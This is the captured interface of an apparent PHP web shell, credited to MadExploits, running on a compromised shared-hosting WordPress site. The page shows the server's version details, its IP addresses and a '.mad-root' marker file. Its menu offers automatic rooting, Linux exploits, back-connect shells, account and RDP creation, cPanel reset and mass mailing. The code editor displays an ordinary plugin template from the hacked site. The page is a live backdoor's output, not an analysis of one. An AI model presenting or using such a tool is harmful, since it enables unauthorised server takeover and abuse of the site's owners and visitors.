Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.137.210.16
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
jnews-view-counter /
template /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
post-stats-most-viewed.php
1.64
KB
-rw-r--r--
post-stats-trending-now.php
1.64
KB
-rw-r--r--
post-stats.php
3.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : post-stats-trending-now.php
<?php if ( isset( $status ) && 'ok' === $status ) { $posts = $data['result']; if ( 0 < count( $posts ) ) { foreach ( $posts as $post ) { $post_status = get_post_status_object( get_post_status( $post->ID ) )->label; $view_count = $post->pageviews; do_action( 'jnews_json_archive_push', $post->ID ); ?> <article <?php post_class( 'jeg_post jeg_pl_sm' ); ?>> <div class="jeg_thumb"> <a href="<?php echo get_the_permalink( $post->ID ); ?>"><?php echo apply_filters( 'jnews_image_thumbnail', $post->ID, 'jnews-120x86' ); ?></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="<?php echo get_the_permalink( $post->ID ); ?>"><?php echo get_the_title( $post->ID ); ?></a> </h3> <div class="jeg_post_meta"> <div class="jeg_post_status <?php echo esc_attr( $post_status ); ?>"><?php echo esc_html( $post_status ); ?></div><span>–</span> <div class="jeg_meta_date"><a href="<?php echo get_the_permalink( $post->ID ); ?>"><?php echo esc_html( jeg_get_post_date() ); ?></a></div> <div class="jeg_meta_views"><a href="<?php echo get_the_permalink( $post->ID ); ?>"><i class="fa fa-eye"></i> <?php echo $view_count; ?> </a></div> </div> <div class="jeg_post_control"> <a class="jeg_post_action edit" href="<?php echo get_the_permalink( $post->ID ); ?>"><?php esc_html_e( 'View Post', 'jnews-view-counter' ); ?></a> </div> </div> </article> <?php } } else { ?> <p style="text-align: center;"><?php _e( "Looks like your site's activity is a little low right now.<br>Spread the word and come back later!", 'jnews-view-counter' ); ?></p> <?php } }
Close